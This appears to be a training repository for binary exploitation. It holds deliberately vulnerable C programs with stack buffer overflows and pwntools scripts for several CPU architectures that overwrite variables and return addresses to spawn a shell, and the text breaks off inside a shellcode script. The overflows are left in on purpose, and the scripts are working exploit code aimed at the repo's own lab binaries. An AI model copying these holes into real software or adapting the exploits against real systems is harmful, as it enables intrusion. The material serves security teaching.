├── src ├── 00-hello-pwn.c ├── 99-test.c ├── 03-one-gadget.c ├── 06-system-rop.c ├── 07-execve-rop.c ├── 04-shellcode-static.c ├── 05-shellcode-dynamic.c ├── 02-overwrite-ret.c ├── 08-overwrite-global.c └── 01-local-overflow.c ├── rename.sh ├── .gitignore ├── pwn ├── arm │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 05-shellcode-dynamic.py │ ├── 06-system-rop.py │ ├── 07-execve-rop.py │ └── 08-overwrite-global.py ├── mips │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 08-overwrite-global.py │ ├── 06-system-rop.py │ ├── 05-shellcode-dynamic.py │ └── 07-execve-rop.py ├── ppc │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 05-shellcode-dynamic.py │ ├── 06-system-rop.py │ ├── 07-execve-rop.py │ └── 08-overwrite-global.py ├── x86 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 05-shellcode-dynamic.py │ ├── 06-system-rop.py │ ├── 03-one-gadget.py │ ├── 04-shellcode-static.py │ ├── 08-overwrite-global.py │ └── 07-execve-rop.py ├── arm64 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 06-system-rop.py │ ├── 08-overwrite-global.py │ ├── 03-one-gadget.py │ ├── 07-execve-rop.py │ └── 05-shellcode-dynamic.py ├── mips64 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 06-system-rop.py │ ├── 07-execve-rop.py │ ├── 08-overwrite-global.py │ └── 05-shellcode-dynamic.py ├── ppc64 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 06-system-rop.py │ ├── 08-overwrite-global.py │ └── 07-execve-rop.py ├── sparc64 │ ├── 01-local-overflow.py │ └── 02-overwrite-ret.py └── x86-64 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 03-one-gadget.py │ ├── 05-shellcode-dynamic.py │ ├── 04-shellcode-static.py │ ├── 06-system-rop.py │ ├── 08-overwrite-global.py │ └── 07-execve-rop.py ├── README.md └── LICENSE /src/00-hello-pwn.c: 
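--------------------------------------------------------------------------------
/* 00-hello-pwn: sanity target, no vulnerability - it just spawns a shell so
 * the toolchain/emulator setup can be checked before the real targets.
 * Header names were stripped by the page rendering; system() and
 * EXIT_SUCCESS come from <stdlib.h>. */
#include <stdlib.h>

int main() {
    system("/bin/sh");
    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------
/src/99-test.c:
--------------------------------------------------------------------------------
/* 99-test: execve() sanity target.
 *
 * Review fixes: the original passed argv == NULL, which hands the shell an
 * argc of 0 (a state several programs mishandle and newer kernels rewrite),
 * and returned 0 even when execve() failed. A real argv/envp is passed and
 * a failed exec is reported; execve() only returns on failure. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    char *const argv[] = { "/bin/sh", NULL };
    char *const envp[] = { NULL };

    execve("/bin/sh", argv, envp);

    /* Only reached if the exec failed. */
    perror("execve");
    return EXIT_FAILURE;
}
--------------------------------------------------------------------------------
/rename.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Bulk search-and-replace over the working tree: rename every file whose
# name matches $1 and rewrite $1 -> $2 inside file contents.
#
# Review fixes:
#  - $1/$2 were spliced unescaped into a perl expression (the perl `rename`
#    eval()s its argument) and into a GNU sed script (whose `e` flag runs a
#    shell command), so a `/`, `;`, `$`, `@` or `\` in an argument escaped the
#    s/// and executed arbitrary code. Arguments are now restricted to a safe
#    character set; `.` is still a regex wildcard, everything else is literal.
#  - the file list was word-split ($(find ...) / plain xargs), breaking on
#    paths containing whitespace; it is NUL-delimited now.
#  - a missing argument produced "s///g" and rewrote nothing meaningful.

set -euxo pipefail

if [ $# -ne 2 ]; then
    echo "usage: $0 <from> <to>" >&2
    exit 1
fi

for arg in "$1" "$2"; do
    case "$arg" in
        *[!A-Za-z0-9_.-]*)
            echo "error: only [A-Za-z0-9_.-] are accepted in <from>/<to>" >&2
            exit 1
            ;;
    esac
done

# Same (unanchored) exclusion as before: anything with .git or .swp in its path.
find ./ -type f -print0 | grep -zvE '\.git|\.swp' | xargs -0 -r rename "s/$1/$2/g"
find ./ -type f -print0 | grep -zvE '\.git|\.swp' | xargs -0 -r sed -i -e "s/$1/$2/g"
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Editor swap files, core dumps, and the per-architecture build outputs
# (presumably bin/ is produced from src/ by the build and never versioned).
*.swp
*.core
core
bin/x86/*
bin/x86-64/*
bin/arm/*
bin/arm64/*
bin/mips/*
bin/mips64/*
bin/ppc/*
bin/ppc64/*
bin/sparc64/*
--------------------------------------------------------------------------------
/src/03-one-gadget.c:
--------------------------------------------------------------------------------
/* 03-one-gadget: INTENTIONALLY VULNERABLE training target.
 *
 * read() may write up to 256 bytes into a 128-byte stack buffer, so the
 * saved registers / return address above it are attacker-controlled. Do not
 * "fix" the bound: the scripts under pwn/ depend on this exact layout.
 * Header names were stripped by the rendering: <stdio.h> (printf, fflush),
 * <stdlib.h> (EXIT_SUCCESS) and <unistd.h> (read, STDIN_FILENO) are needed. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int vulnerable() {
    printf("> ");
    fflush(stdout);

    char buffer[128];
    read(STDIN_FILENO, &buffer[0], 256);   /* deliberate overflow: 256 > sizeof buffer */
    /* NOTE(review): declared int but returns no value, and read()'s result is
     * ignored - both are part of the target as built and left unchanged. */
}

int main(int argc, char** argv) {
    vulnerable();

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------
/src/06-system-rop.c:
--------------------------------------------------------------------------------
/* 06-system-rop: INTENTIONALLY VULNERABLE training target (same shape as
 * 03-one-gadget, but read() may write 512 bytes into the 128-byte buffer,
 * leaving room for a return-to-libc chain). Headers as in 03-one-gadget. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int vulnerable() {
    printf("> ");
    fflush(stdout);

    char buffer[128];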
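    read(STDIN_FILENO, &buffer[0], 512);   /* deliberate overflow: 512 > sizeof buffer */
}

int main(int argc, char** argv) {
    vulnerable();

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------
/src/07-execve-rop.c:
--------------------------------------------------------------------------------
/* 07-execve-rop: INTENTIONALLY VULNERABLE training target. read() may write
 * 1024 bytes into a 128-byte stack buffer (room for a longer ROP chain).
 * Header names were stripped by the rendering: <stdio.h>, <stdlib.h> and
 * <unistd.h> are needed. Do not "fix" the bound - pwn/ depends on it. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int vulnerable() {
    printf("> ");
    fflush(stdout);

    char buffer[128];
    read(STDIN_FILENO, &buffer[0], 1024);  /* deliberate overflow: 1024 > sizeof buffer */
}

int main(int argc, char** argv) {
    vulnerable();

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------
/src/04-shellcode-static.c:
--------------------------------------------------------------------------------
/* 04-shellcode-static: INTENTIONALLY VULNERABLE training target for stack
 * shellcode. read() may write 512 bytes into a 128-byte stack buffer; the
 * exploit places code after the return address and jumps to it, which also
 * requires an executable stack (see the pwn/ scripts for that assumption).
 * Header names were stripped by the rendering: <stdio.h>, <stdlib.h> and
 * <unistd.h> (read, usleep) are needed. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int vulnerable() {
    printf("> ");
    fflush(stdout);

    char buffer[128];
    read(STDIN_FILENO, &buffer[0], 512);   /* deliberate overflow: 512 > sizeof buffer */

    // Dealing with cache coherency.
    // NOTE(review): a delay neither flushes the data cache nor invalidates
    // the instruction cache. Code written into the stack by read() needs an
    // explicit I-cache sync (cacheflush(2) / __builtin___clear_cache) on
    // real ARM/MIPS hardware; presumably this is tolerable here only because
    // the targets run under qemu-user (see the strace transcripts in pwn/).
    usleep(1000);
}

int main(int argc, char** argv) {
    vulnerable();

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------
/src/05-shellcode-dynamic.c:
--------------------------------------------------------------------------------
/* 05-shellcode-dynamic: INTENTIONALLY VULNERABLE training target, identical
 * to 04-shellcode-static; the difference is in the exploit (a libc
 * "jump to stack pointer" gadget instead of a hard-coded stack address).
 * Headers as in 04-shellcode-static. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int vulnerable() {
    printf("> ");
    fflush(stdout);

    char buffer[128];
    read(STDIN_FILENO, &buffer[0], 512);   /* deliberate overflow: 512 > sizeof buffer */

    // Dealing with cache coherency.
    // NOTE(review): see 04-shellcode-static - a sleep is not a cache sync;
    // real hardware needs cacheflush(2) / __builtin___clear_cache.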
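    usleep(1000);
}

int main(int argc, char** argv) {
    vulnerable();

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------
/src/02-overwrite-ret.c:
--------------------------------------------------------------------------------
/* 02-overwrite-ret: INTENTIONALLY VULNERABLE training target. read() may
 * write 256 bytes into a 128-byte stack buffer; the goal is to redirect the
 * return address of vulnerable() to not_called(), which nothing in this file
 * reaches legitimately. Header names were stripped by the rendering:
 * <stdio.h>, <stdlib.h> (system, EXIT_SUCCESS) and <unistd.h> are needed. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Never called by the program itself - the exploit target. */
void not_called() {
    printf("launching shell...\n");
    system("/bin/sh");
}

int vulnerable() {
    printf("> ");
    fflush(stdout);

    char buffer[128];
    read(STDIN_FILENO, &buffer[0], 256);   /* deliberate overflow: 256 > sizeof buffer */
}

int main(int argc, char** argv) {
    vulnerable();

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------
/pwn/arm/01-local-overflow.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 01-local-overflow (arm, 32-bit): overwrite the struct member `x` that sits
# directly after the 128-byte buffer in src/01-local-overflow.c. No control
# flow is hijacked; the target itself launches a shell when x matches.
#
# NOTE(review): Python 2 pwntools (str payloads, `readuntil` alias of
# recvuntil). On a 32-bit target `unsigned long` is 32 bits, so the 64-bit
# magic in the C source truncates to its low word, 0xbeefc0de, written here.

import struct
import sys

from pwn import *

context(arch='arm', os='linux', endian='little', word_size=32)

binary_path = './bin/arm/01-local-overflow'

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * 128          # fills f.buffer exactly
payload += p32(0xbeefc0de)    # lands in f.x; p32 follows the context endianness

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/mips/01-local-overflow.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 01-local-overflow (mips, 32-bit big-endian): same payload as the arm
# version - 128 filler bytes then the 32-bit magic into `f.x`. The only
# architecture-specific part is the context, which makes p32() emit the
# value big-endian. Python 2 pwntools.

import struct
import sys

from pwn import *

context(arch='mips', os='linux', endian='big', word_size=32)

binary_path = './bin/mips/01-local-overflow'

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * 128          # fills f.buffer exactly
payload += p32(0xbeefc0de)    # low word of the magic (unsigned long is 32-bit here)

p.readuntil('> ')
p.write(payload)
p.interactive()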
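--------------------------------------------------------------------------------
/pwn/ppc/01-local-overflow.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 01-local-overflow (ppc, 32-bit big-endian): 128 filler bytes then the
# 32-bit magic into `f.x` (see src/01-local-overflow.c). Python 2 pwntools;
# p32() emits big-endian because of the context below.

import struct
import sys

from pwn import *

context(arch='powerpc', os='linux', endian='big', word_size=32)

binary_path = './bin/ppc/01-local-overflow'

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * 128          # fills f.buffer exactly
payload += p32(0xbeefc0de)    # low word of the magic (unsigned long is 32-bit here)

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/x86/01-local-overflow.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 01-local-overflow (x86, 32-bit little-endian): 128 filler bytes then the
# 32-bit magic into `f.x` (see src/01-local-overflow.c). Python 2 pwntools.

import struct
import sys

from pwn import *

context(arch='x86', os='linux', endian='little', word_size=32)

binary_path = './bin/x86/01-local-overflow'

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * 128          # fills f.buffer exactly
payload += p32(0xbeefc0de)    # low word of the magic (unsigned long is 32-bit here)

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/arm64/01-local-overflow.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 01-local-overflow (aarch64): 128 filler bytes then the full 64-bit magic
# into `f.x` - `unsigned long` is 64-bit here, so no truncation. Python 2
# pwntools.

import struct
import sys

from pwn import *

context(arch='aarch64', os='linux', endian='little', word_size=64)

binary_path = './bin/arm64/01-local-overflow'

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * 128                  # fills f.buffer exactly
payload += p64(0xdeadbabebeefc0de)    # lands in f.x

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------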
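/pwn/mips64/01-local-overflow.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 01-local-overflow (mips64, big-endian): 128 filler bytes then the full
# 64-bit magic into `f.x` (64-bit unsigned long, no truncation). Python 2
# pwntools; p64() emits big-endian because of the context.

import struct
import sys

from pwn import *

context(arch='mips64', os='linux', endian='big', word_size=64)

binary_path = './bin/mips64/01-local-overflow'

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * 128                  # fills f.buffer exactly
payload += p64(0xdeadbabebeefc0de)    # lands in f.x

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/ppc64/01-local-overflow.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 01-local-overflow (ppc64, big-endian): 128 filler bytes then the full
# 64-bit magic into `f.x`. Python 2 pwntools.
#
# Review fix: the commented-out debug line passed the string literal
# 'binary_path' instead of the variable, so enabling it would have tried to
# run a file literally named "binary_path".

import struct
import sys

from pwn import *

context(arch='powerpc64', os='linux', endian='big', word_size=64)

binary_path = './bin/ppc64/01-local-overflow'

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * 128                  # fills f.buffer exactly
payload += p64(0xdeadbabebeefc0de)    # lands in f.x

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/sparc64/01-local-overflow.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 01-local-overflow (sparc64, big-endian): 128 filler bytes then the full
# 64-bit magic into `f.x`. Python 2 pwntools.
#
# Review fix: the commented-out debug line passed the string literal
# 'binary_path' instead of the variable (same slip as the ppc64 script).

import struct
import sys

from pwn import *

context(arch='sparc64', os='linux', endian='big', word_size=64)

binary_path = './bin/sparc64/01-local-overflow'

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * 128                  # fills f.buffer exactly
payload += p64(0xdeadbabebeefc0de)    # lands in f.x

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/x86-64/01-local-overflow.py: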
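--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 01-local-overflow (x86-64): 128 filler bytes then the full 64-bit magic
# into `f.x` (see src/01-local-overflow.c). Python 2 pwntools.
#
# Review fix: the commented-out debug line passed the string literal
# 'binary_path' instead of the variable.

import struct
import sys

from pwn import *

context(arch='amd64', os='linux', endian='little', word_size=64)

binary_path = './bin/x86-64/01-local-overflow'

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * 128                  # fills f.buffer exactly
payload += p64(0xdeadbabebeefc0de)    # lands in f.x

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/src/08-overwrite-global.c:
--------------------------------------------------------------------------------
/* 08-overwrite-global: INTENTIONALLY VULNERABLE training target. read() may
 * write 1024 bytes into a 128-byte stack buffer. not_called() spawns a shell
 * only when the global `x` holds the magic value; nothing in this file calls
 * not_called() or writes `x`, so both have to be done by the exploit.
 * Header names were stripped by the rendering: <stdio.h>, <stdlib.h> and
 * <unistd.h> are needed (a fourth include in the original was lost). */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Zero-initialised (static storage); the exploit must set it. */
unsigned long x;

int vulnerable() {
    printf("> ");
    fflush(stdout);

    char buffer[128];
    read(STDIN_FILENO, &buffer[0], 1024);  /* deliberate overflow: 1024 > sizeof buffer */
}

/* Never reached by the program itself. On 32-bit targets unsigned long is
 * 32 bits and the cast truncates the constant to 0xbeefc0de. */
void not_called() {
    if (x == (unsigned long)0xdeadbabebeefc0deUL) {
        system("/bin/sh");
    }
}

int main(int argc, char** argv) {
    vulnerable();

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------
/src/01-local-overflow.c:
--------------------------------------------------------------------------------
/* 01-local-overflow: INTENTIONALLY VULNERABLE training target. read() may
 * write 256 bytes into the 128-byte `buffer`, and `x` is laid out directly
 * after it in the same struct, so bytes 128..131 (32-bit) or 128..135
 * (64-bit) of the input land in `x`. Header names were stripped by the
 * rendering: <stdio.h>, <stdlib.h>, <unistd.h> and <string.h> (memset). */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

struct frame {
    char buffer[128];
    unsigned long x;
};

int main(int argc, char** argv) {
    struct frame f;
    memset(&f, 0, sizeof(f));   /* x starts at 0, so only the overflow can set it */

    printf("> ");
    fflush(stdout);

    read(STDIN_FILENO, &f.buffer[0], 256);   /* deliberate overflow: 256 > sizeof f.buffer */

    /* Echoes x so a wrong payload can be diagnosed. On 32-bit targets
     * unsigned long is 32 bits: the cast below truncates the constant to
     * 0xbeefc0de, which is why the 32-bit scripts send only that word. */
    printf("x = %lx\n", f.x);
    if (f.x == (unsigned long)0xdeadbabebeefc0deUL) {
        printf("launching shell...\n");
        system("/bin/sh");
    }

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------
/pwn/x86/02-overwrite-ret.py: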
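--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) b *(&vulnerable)
Breakpoint 1 at 0x804853f: file src/02-overwrite-ret.c, line 10.
(gdb) c
Continuing.
Reading /lib/i386-linux-gnu/libc.so.6 from remote target...
Reading /lib/i386-linux-gnu/libc-2.27.so from remote target...
Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target...

Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:10
10      int vulnerable() {
(gdb) i r $esp
esp            0xffc0637c       0xffc0637c
(gdb) p &buffer[0]
$1 = 0xffc062f0 ""
"""

# 02-overwrite-ret (x86): overwrite vulnerable()'s saved return address with
# the address of not_called(). The breakpoint above sits before the
# prologue, so $esp at that point IS the address of the return-address slot;
# the padding is that slot minus the buffer address (0x8c bytes).
#
# NOTE(review): the stack addresses are the ones recorded in that one gdb
# session. They are only valid with ASLR disabled and an environment/argv
# identical to the recorded run - a different environment shifts the stack
# and the padding no longer lands on the slot. Python 2 pwntools.

import struct
import sys

from pwn import *

context(arch='x86', os='linux', endian='little', word_size=32)

binary_path = './bin/x86/02-overwrite-ret'

vulnerable_ret_addr = 0xffc0637c
buffer_addr = 0xffc062f0

binary = ELF(binary_path)
not_called_addr = binary.symbols['not_called']   # from the (non-PIE) ELF, no base needed

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (vulnerable_ret_addr - buffer_addr)   # buffer + everything up to the slot
payload += p32(not_called_addr)                        # new return address

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/arm/02-overwrite-ret.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
   0x000104e0 <+0>:     push    {r7, lr}
   ...
   0x00010518 <+56>:    pop     {r7, pc}
End of assembler dump.
(gdb) b *0x00010518
Breakpoint 1 at 0x10518: file src/02-overwrite-ret.c, line 16.
(gdb) c
Continuing.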
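
Breakpoint 1, 0x00010518 in vulnerable () at src/02-overwrite-ret.c:16
16      }
(gdb) i r $sp
sp             0xfffeef20       0xfffeef20
(gdb) p &buffer[0]
$1 = 0xfffeeea0 'a' , "(\357\376\377)\005\001"

"""

# 02-overwrite-ret (arm): at the `pop {r7, pc}` breakpoint above, $sp points
# at the saved r7 and $sp+4 at the saved lr that becomes pc - that is the slot
# overwritten with not_called()'s address. Padding = slot - buffer (0x84).
#
# NOTE(review): stack addresses come from that single gdb session and assume
# ASLR is off and the environment matches. Python 2 pwntools.

import struct
import sys

from pwn import *

context(arch='arm', os='linux', endian='little', word_size=32)

binary_path = './bin/arm/02-overwrite-ret'

saved_pc_addr = 0xfffeef20 + 4   # r7 is popped first, pc second
buffer_addr = 0xfffeeea0

binary = ELF(binary_path)
not_called_addr = binary.symbols['not_called']

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (saved_pc_addr - buffer_addr)   # buffer + saved r7
payload += p32(not_called_addr)                  # popped into pc

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/x86-64/02-overwrite-ret.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) b *(&vulnerable)
Breakpoint 1 at 0x400662: file src/02-overwrite-ret.c, line 10.
(gdb) c
Continuing.
Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target...
Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target...
Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target...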
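
Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:10
10      int vulnerable() {
(gdb) i r $rsp
rsp            0x7ffcdbdc39d8   0x7ffcdbdc39d8
(gdb) p &buffer[0]
$1 = 0x7ffcdbdc3950 "\377\377\377\377"
"""

# 02-overwrite-ret (x86-64): the breakpoint is before the prologue, so $rsp
# is the return-address slot; padding = slot - buffer (0x88 bytes).
#
# The extra `ret` gadget before not_called() realigns the stack: after the
# overwritten return the stack pointer is 8 bytes off the 16-byte alignment
# the SysV ABI guarantees at a call, and not_called() goes on to call
# system(), which (presumably via an aligned SSE store in glibc) crashes on
# a misaligned stack. One `ret` consumes 8 bytes and restores alignment.
#
# NOTE(review): the stack addresses assume ASLR off and an environment
# identical to the recorded session. Python 2 pwntools (`.next()`).

import struct
import sys

from pwn import *

context(arch='amd64', os='linux', endian='little', word_size=64)

binary_path = './bin/x86-64/02-overwrite-ret'

vulnerable_ret_addr = 0x7ffcdbdc39d8
buffer_addr = 0x7ffcdbdc3950

binary = ELF(binary_path)
not_called_addr = binary.symbols['not_called']

retq_asm = asm('retq')
retq_addr = binary.search(retq_asm).next()   # first `ret` byte (0xc3) in the binary

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (vulnerable_ret_addr - buffer_addr)
payload += p64(retq_addr) # align stack
payload += p64(not_called_addr)

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/arm64/02-overwrite-ret.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000400734 <+0>:     stp     x29, x30, [sp, #-32]!
   ...
   0x000000000040074c <+24>:    ldp     x29, x30, [sp], #32
   0x0000000000400750 <+28>:    ret
End of assembler dump.
(gdb) b vulnerable
(gdb) b *0x000000000040074c
Breakpoint 2 at 0x40074c: file src/02-overwrite-ret.c, line 22.
(gdb) c
Continuing.

Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11
11          printf("> ");
(gdb) p &buffer[0]
$1 = 0x40007ffd30 ""
(gdb) c
Continuing.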
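
Breakpoint 2, main (argc=1, argv=0x40007fff08) at src/02-overwrite-ret.c:22
22      }
(gdb) i r $sp
sp             0x40007ffdb0     0x40007ffdb0
"""

# 02-overwrite-ret (aarch64): note the target slot is MAIN's saved x30, not
# vulnerable()'s - the session above breaks at main's `ldp x29, x30, [sp]`,
# where $sp holds the saved x29 and $sp+8 the saved x30 (link register).
# Presumably the AArch64 frame record of vulnerable() lives below its buffer
# and is unreachable from the overflow, so the first frame the overflow can
# reach is the caller's. Padding = slot - buffer (0x88 bytes).
#
# NOTE(review): stack addresses assume ASLR off and a matching environment.
# Python 2 pwntools.

import struct
import sys

from pwn import *

context(arch='aarch64', os='linux', endian='little', word_size=64)

binary_path = './bin/arm64/02-overwrite-ret'

saved_x30_addr = 0x40007ffdb0 + 8   # x29 at sp, x30 at sp+8 (main's frame record)
buffer_addr = 0x40007ffd30

binary = ELF(binary_path)
not_called_addr = binary.symbols['not_called']

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (saved_x30_addr - buffer_addr)
payload += p64(not_called_addr)   # becomes main's return address

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/ppc/02-overwrite-ret.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
   0x100005b4 <+0>:     stwu    r1,-144(r1)
   ...
   0x10000608 <+84>:    lwz     r0,4(r11)
   0x1000060c <+88>:    mtlr    r0
   0x10000610 <+92>:    lwz     r31,-4(r11)
   0x10000614 <+96>:    mr      r1,r11
   0x10000618 <+100>:   blr
End of assembler dump.
(gdb) b vulnerable
Breakpoint 1 at 0x100005c8: file src/02-overwrite-ret.c, line 11.
(gdb) b *0x10000608
Breakpoint 2 at 0x10000608: file src/02-overwrite-ret.c, line 16.
(gdb) c
Continuing.

Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11
11          printf("> ");
(gdb) p &buffer[0]
$1 = 0xffffdd98 "\377\377\335",
(gdb) c
Continuing.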
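
Breakpoint 2, 0x10000608 in vulnerable () at src/02-overwrite-ret.c:16
16      }
(gdb) p/x $r11+4
$3 = 0xffffde24
"""

# 02-overwrite-ret (ppc, 32-bit): the epilogue above reloads the link
# register from 4(r11) (`lwz r0,4(r11); mtlr r0; ... blr`), so $r11+4 at
# breakpoint 2 is the saved-LR slot to overwrite. Padding = slot - buffer
# (0x8c bytes).
#
# NOTE(review): stack addresses assume ASLR off and a matching environment.
# Python 2 pwntools; p32() is big-endian per the context.

import struct
import sys

from pwn import *

context(arch='powerpc', os='linux', endian='big', word_size=32)

binary_path = './bin/ppc/02-overwrite-ret'

saved_pc_addr = 0xffffde24   # $r11+4 at the epilogue breakpoint
buffer_addr = 0xffffdd98

binary = ELF(binary_path)
not_called_addr = binary.symbols['not_called']

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (saved_pc_addr - buffer_addr)
payload += p32(not_called_addr)   # loaded into LR, then `blr` jumps there

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/mips/02-overwrite-ret.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
   0x00400860 <+0>:     addiu   sp,sp,-160
   0x00400864 <+4>:     sw      ra,156(sp)
   ...
   0x004008e4 <+132>:   lw      ra,156(sp)
   0x004008e8 <+136>:   lw      s8,152(sp)
   0x004008ec <+140>:   addiu   sp,sp,160
   0x004008f0 <+144>:   jr      ra
   0x004008f4 <+148>:   nop
End of assembler dump.
(gdb) b vulnerable
Breakpoint 1 at 0x40087c: file src/02-overwrite-ret.c, line 11.
(gdb) b *0x004008e4
Breakpoint 2 at 0x4008e4: file src/02-overwrite-ret.c, line 16.
(gdb) c
Continuing.

Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11
11          printf("> ");
(gdb) p &buffer[0]
$1 = 0x7fffef08 "\177~\272X\177~\243\f\177|\210D"
(gdb) c
Continuing.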
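
Breakpoint 2, 0x004008e4 in vulnerable () at src/02-overwrite-ret.c:16
16      }
(gdb) p/x $sp+156
$3 = 0x7fffef8c
"""

# 02-overwrite-ret (mips, 32-bit big-endian): the prologue stores ra at
# 156(sp) and the epilogue reloads it from there before `jr ra`, so $sp+156
# at breakpoint 2 is the slot to overwrite. Padding = slot - buffer (0x84).
#
# NOTE(review): stack addresses assume ASLR off and a matching environment.
# Python 2 pwntools; p32() is big-endian per the context.

import struct
import sys

from pwn import *

context(arch='mips', os='linux', endian='big', word_size=32)

binary_path = './bin/mips/02-overwrite-ret'

ra_saved_addr = 0x7fffef8c   # $sp+156 at the epilogue breakpoint
buffer_addr = 0x7fffef08

binary = ELF(binary_path)
not_called_addr = binary.symbols['not_called']

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (ra_saved_addr - buffer_addr)
payload += p32(not_called_addr)   # loaded into ra, then `jr ra`

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/arm/04-shellcode-static.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
   0x00010490 <+0>:     push    {r7, lr}
   ...
   0x000104d0 <+64>:    pop     {r7, pc}
End of assembler dump.
(gdb) b *0x000104d0
Breakpoint 1 at 0x104d0: file src/04-shellcode-static.c, line 14.
(gdb) c
Continuing.

Breakpoint 1, 0x000104d0 in vulnerable () at src/04-shellcode-static.c:14
14      }
(gdb) p &buffer[0]
$1 = 0xfffeeef0 'a' , ")\033k\377hp"
(gdb) i r $sp
sp             0xfffeef70       0xfffeef70
"""

"""
$ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/04-shellcode-static
...
17211 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3
...
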